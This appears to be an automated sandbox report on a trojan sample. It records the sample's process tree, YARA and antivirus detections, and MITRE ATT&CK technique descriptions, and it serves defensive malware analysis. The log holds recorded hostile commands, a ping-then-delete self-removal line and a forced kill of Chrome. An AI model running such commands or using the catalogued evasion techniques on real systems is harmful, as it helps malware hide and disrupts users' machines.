Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.368875483.0000000002690000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: msiexec.exe PID: 6488 Parent PID: 6336

General

Start time:	13:03:10
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Imagebase:	0x100000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: msiexec.exe PID: 6572 Parent PID: 580

General

Start time:	13:03:12
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding CF809D2679ADCE8E1511069275F0596C C
Imagebase:	0x100000
File size:	59904 bytes
MD5 hash:	12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 26FF190E7AE0F7C7.exe PID: 6676 Parent PID: 6336

General

Start time:	13:03:15
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 0011 installp3
Imagebase:	0x400000
File size:	4255416 bytes
MD5 hash:	29389832E538957DC769CF709F80144A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000006.00000002.425171659.00000000026C0000.00000040.00000001.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 28%, Metadefender, Browse Detection: 65%, ReversingLabs
Reputation:	low

Analysis Process: 26FF190E7AE0F7C7.exe PID: 6688 Parent PID: 6336

General

Start time:	13:03:16
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe 200 installp3
Imagebase:	0x400000
File size:	4255416 bytes
MD5 hash:	29389832E538957DC769CF709F80144A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000007.00000002.384812793.00000000025A0000.00000040.00000001.sdmp, Author: Florian Roth
Reputation:	low

Analysis Process: cmd.exe PID: 6736 Parent PID: 6336

General

Start time:	13:03:20
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6744 Parent PID: 6736

General

Start time:	13:03:21
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: PING.EXE PID: 6832 Parent PID: 6736

General

Start time:	13:03:24
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x3c0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 1618257864703.exe PID: 6876 Parent PID: 6676

General

Start time:	13:03:24
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Roaming\1618257864703.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\1618257864703.exe' /sjson 'C:\Users\user\AppData\Roaming\1618257864703.txt'
Imagebase:	0x400000
File size:	103632 bytes
MD5 hash:	EF6F72358CB02551CAEBE720FBC55F95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 6932 Parent PID: 6688

General

Start time:	13:03:26
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c taskkill /f /im chrome.exe
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 6940 Parent PID: 6932

General

Start time:	13:03:26
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskkill.exe PID: 6984 Parent PID: 6932

General

Start time:	13:03:27
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im chrome.exe
Imagebase:	0xf20000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 7040 Parent PID: 6688

General

Start time:	13:03:28
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 7052 Parent PID: 7040

General

Start time:	13:03:28
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: PING.EXE PID: 7084 Parent PID: 7040

General

Start time:	13:03:28
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x3c0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: ThunderFW.exe PID: 6188 Parent PID: 6676

General

Start time:	13:03:40
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Imagebase:	0x10000
File size:	73160 bytes
MD5 hash:	F0372FF8A6148498B19E04203DBB9E69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 2%, ReversingLabs

Analysis Process: cmd.exe PID: 6752 Parent PID: 6676

General

Start time:	13:03:47
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe'
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 5900 Parent PID: 6752

General

Start time:	13:03:47
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: PING.EXE PID: 5880 Parent PID: 6752

General

Start time:	13:03:48
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x3c0000
File size:	18944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Browser extensions, File monitoring, Process monitoring, Process use of network, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	API monitoring, MBR, VBR
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Trojan.Siggen12.33370.30028.25368

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre